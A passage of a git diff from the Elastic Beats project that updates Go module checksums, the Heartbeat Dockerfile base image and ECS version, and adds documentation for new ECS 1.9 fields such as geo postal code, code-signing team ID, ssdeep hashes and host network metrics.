github.com/andrewkroh/sys v0.0.0-20151128191922-287798fe3e43/go.mod h1:tJPYQG4mn github.com/antihax/optional v0.0.0-20180407024304-ca021399b1a6/go.mod h1:V8iCPQYkqmusNa815XgQio277wI47sdRh1dUOLdyC6Q= github.com/antlr/antlr4 v0.0.0-20200820155224-be881fa6b91d h1:OE3kzLBpy7pOJEzE55j9sdgrSilUPzzj++FWvp1cmIs= github.com/antlr/antlr4 v0.0.0-20200820155224-be881fa6b91d/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y= +github.com/apache/thrift v0.13.1-0.20200603211036-eac4d0c79a5f h1:33BV5v3u8I6dA2dEoPuXWCsAaHHOJfPtdxZhAMQV4uo= +github.com/apache/thrift v0.13.1-0.20200603211036-eac4d0c79a5f/go.mod h1:cp2SuWMxlEZw2r+iP2GNCdIi4C1qmUzdZFSVb+bacwQ= github.com/apoydence/eachers v0.0.0-20181020210610-23942921fe77 h1:afT88tB6u9JCKQZVAAaa9ICz/uGn5Uw9ekn6P22mYKM= github.com/apoydence/eachers v0.0.0-20181020210610-23942921fe77/go.mod h1:bXvGk6IkT1Agy7qzJ+DjIw/SJ1AaB3AvAuMDVV+Vkoo= github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5doyWs3UAsr3K4I6qtAmlQcZDesFNEHPZAzj8= @@ -245,8 +247,8 @@ github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3 h1:lnDkqiRFKm0rxdljqr github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3/go.mod h1:aPqzac6AYkipvp4hufTyMj5PDIphF3+At8zr7r51xjY= github.com/elastic/ecs v1.8.0 h1:wa61IDQsQcZyJa6hwbhqGO+631H+kGHhe0J4V7tMPZY= github.com/elastic/ecs v1.8.0/go.mod h1:pgiLbQsijLOJvFR8OTILLu0Ni/R/foUNg0L+T6mU9b4= -github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a h1:2NHgf1RUw+f240lpTnLrCp1aBNvq2wDi0E1A423/S1k= -github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= +github.com/elastic/elastic-agent-client/v7 v7.0.0-20210308165121-7dd05ee2b5a5 h1:n4VHMzwk4o8+0zTCDej1M6uUR9rkzScpSeZXi0B8y1w= +github.com/elastic/elastic-agent-client/v7 v7.0.0-20210308165121-7dd05ee2b5a5/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270 h1:cWPqxlPtir4RoQVCpGSRXmLqjEHpJKbR60rxh1nQZY4= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270/go.mod h1:Msl1pdboCbArMF/nSCDUXgQuWTeoMmE/z8607X+k7ng= github.com/elastic/go-concert v0.1.0 h1:gz/yvA3bseuHzoF/lNMltkL30XdPqMo+bg5o2mBx2EE= @@ -278,8 +280,8 @@ github.com/elastic/go-ucfg v0.8.3/go.mod h1:iaiY0NBIYeasNgycLyTvhJftQlQEUO2hpF+F github.com/elastic/go-windows v1.0.0/go.mod h1:TsU0Nrp7/y3+VwE82FoZF8gC/XFg/Elz6CcloAxnPgU= github.com/elastic/go-windows v1.0.1 h1:AlYZOldA+UJ0/2nBuqWdo90GFCgG9xuyw9SYzGUtJm0= github.com/elastic/go-windows v1.0.1/go.mod h1:FoVvqWSun28vaDQPbj2Elfc0JahhPB7WQEGa3c814Ss= -github.com/elastic/gosigar v0.14.0 h1:5w470Q8AagzVY8U48ab8rVkQrOXiIK1NHBYWrAxi9kI= -github.com/elastic/gosigar v0.14.0/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= +github.com/elastic/gosigar v0.14.1 h1:T0aQ7n/n2ZA9W7DmAnj60v+qzqKERdBgJBO1CG2W6rc= +github.com/elastic/gosigar v0.14.1/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877 h1:C9LsbipColsz04JKpKoLlp0pgMJRLq2uXVTeKRDcNcY= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877/go.mod h1:g5s5osgELxgM+Md9Qni9rzo7Rbt+vvFQI4bt/Mc93II= github.com/elazarl/goproxy v0.0.0-20180725130230-947c36da3153 h1:yUdfgN0XgIJw7foRItutHYUIhlcKzcSf5vDpdhQAKTc= @@ -366,6 +368,8 @@ github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvq github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= github.com/golang/protobuf v1.4.2 h1:+Z5KGCizgyZCbGh1KZqA0fcLLkwbsjIzS4aV2v7wJX0= github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3 h1:JjCZWpVbqXDqFVmTfYWEVTMIYrL/NPdPSCHPJ0T/raM= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/snappy v0.0.1 h1:Qgr9rKW7uDUkrbSmQeiDsGa8SjGyCOGtuasMWwvp2P4= github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/gomodule/redigo v1.8.3 h1:HR0kYDX2RJZvAup8CsiJwxB4dTCSC0AaUq6S4SiLwUc= @@ -378,6 +382,7 @@ github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5a github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM= github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= @@ -394,8 +399,8 @@ github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm4 github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaUGG7oYTSPP8MxqL4YI3kZKwcP4= github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f h1:XXzyYlFbxK3kWfcmu3Wc+Tv8/QQl/VqwsWuSYF1Rj0s= -github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5 h1:sjZBwGj9Jlw33ImPtvFviGYvseOtDM7hkSKB7+Tv3SM= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -489,6 +494,8 @@ github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQL github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/klauspost/compress v1.11.0 h1:wJbzvpYMVGG9iTI9VxpnNZfd4DzMPoCWze3GgSqz8yg= github.com/klauspost/compress v1.11.0/go.mod h1:aoV0uJVorq1K+umq18yTdKaF57EivdYsUV+/s2qKfXs= +github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac h1:TI5z/itepBADxlaodO5U9mmrMHPu8Wb8Jt9Gea6vK4Y= +github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac/go.mod h1:rp36fokOKgd/5mOgbvv4fkpdaucQ43mnvb+8BR62Xo8= github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= github.com/konsorten/go-windows-terminal-sequences v1.0.2 h1:DB17ag19krx9CFsz4o3enTrPXyIXCl+2iCXH/aMAp9s= github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= @@ -825,6 +832,8 @@ golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/ golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= golang.org/x/net v0.0.0-20200904194848-62affa334b73 h1:MXfv8rhZWmFeqX3GNZRsd6vOLoaCHjYEX3qkRo3YBUA= golang.org/x/net v0.0.0-20200904194848-62affa334b73/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 h1:qWPm9rbaAMKs8Bq/9LRpbMqxWRVUAQwMI9fVrssnTfw= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190130055435-99b60b757ec1/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -841,6 +850,7 @@ golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJ golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a h1:WXEvlFVvvGxCJLG6REjsT03iWnKLEWinaScsxF2Vm2o= golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20180810173357-98c5dad5d1a0/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20180815093151-14742f9018cd/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= @@ -878,11 +888,17 @@ golang.org/x/sys v0.0.0-20200615200032-f1bc736245b1/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20200622214017-ed371f2e16b4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201009025420-dfb3f7c4e634 h1:bNEHhJCnrwMKNMmOx3yAynp5vs5/gRy+XWFtZFu7NBM= golang.org/x/sys v0.0.0-20201009025420-dfb3f7c4e634/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210308170721-88b6017d0656 h1:FuBaiPCiXkq4v+JY5JEGPU/HwEZwpVyDbu/KBz9fU+4= +golang.org/x/sys v0.0.0-20210308170721-88b6017d0656/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3 h1:cokOdA+Jmi5PJGXLlLllQSgYigAEfHXJAERHVMaCc2k= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5 h1:i6eZZ+zk0SOf0xgBpEpPD18qWcJda6q1sxt3S0kzyUQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20191024005414-555d28b269f0 h1:/5xXl8Y5W96D+TtHSlonuFqGHIWVuyCkGJLwGh9JJFs= @@ -919,6 +935,8 @@ google.golang.org/genproto v0.0.0-20190927181202-20e1ac93f88c/go.mod h1:IbNlFCBr google.golang.org/genproto v0.0.0-20191230161307-f3c370f40bfb/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013 h1:+kGHl1aib/qcwaRi1CbqBZ1rk19r85MNUf8HaBghugY= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= +google.golang.org/genproto v0.0.0-20210303154014-9728d6b83eeb h1:hcskBH5qZCOa7WpTUFUFvoebnSFZBYpjykLtjIp9DVk= +google.golang.org/genproto v0.0.0-20210303154014-9728d6b83eeb/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= @@ -940,6 +958,8 @@ google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2 google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.24.0 h1:UhZDfRO8JRQru4/+LlLE0BRKGF8L+PICnvYZmx/fEGA= google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0 h1:Ejskq+SyPohKW+1uil0JJMtmHCgJPJ/qWTxr8qp+R4c= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= gopkg.in/airbrake/gobrake.v2 v2.0.9/go.mod h1:/h5ZAUhDkGaJfjzjKLSjv6zCL6O0LLBxU4K+aSYdM/U= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= diff --git a/heartbeat/Dockerfile b/heartbeat/Dockerfile index 0f6bdf7b3a3..8f2739234e3 100644 --- a/heartbeat/Dockerfile +++ b/heartbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/heartbeat/cmd/root.go b/heartbeat/cmd/root.go index bfbfa22d1b4..d5b96e82a9c 100644 --- a/heartbeat/cmd/root.go +++ b/heartbeat/cmd/root.go @@ -41,7 +41,7 @@ const ( Name = "heartbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd to handle beats cli diff --git a/heartbeat/docs/fields.asciidoc b/heartbeat/docs/fields.asciidoc index f3d5f451c00..73ceb5d61c5 100644 --- a/heartbeat/docs/fields.asciidoc +++ b/heartbeat/docs/fields.asciidoc @@ -96,6 +96,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -619,6 +628,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -676,6 +696,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -698,6 +730,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -711,9 +754,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -1028,6 +1074,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -1045,6 +1103,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -1068,6 +1138,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1234,6 +1316,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1291,6 +1384,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1313,6 +1418,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -1326,9 +1442,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -1547,6 +1666,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -1570,6 +1701,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -1630,6 +1773,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2375,6 +2527,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2398,6 +2562,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -2546,6 +2722,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -3036,6 +3221,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -3093,6 +3289,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -3115,6 +3323,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3152,8 +3371,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3192,6 +3412,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -3210,6 +3439,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3233,6 +3491,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3290,6 +3559,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3312,6 +3593,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3345,10 +3637,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -3361,6 +3656,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -3638,6 +3969,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4171,7 +4514,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4235,7 +4578,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4254,6 +4597,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4311,6 +4665,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4333,6 +4699,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4345,7 +4722,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor 